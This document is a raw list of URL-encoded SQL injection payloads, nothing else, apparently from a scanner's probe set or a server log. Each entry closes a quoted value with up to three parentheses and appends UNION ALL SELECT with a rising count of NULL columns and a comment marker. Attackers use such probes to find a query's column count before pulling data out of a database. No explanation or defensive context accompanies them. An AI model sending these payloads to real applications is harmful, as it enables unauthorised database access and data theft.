1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 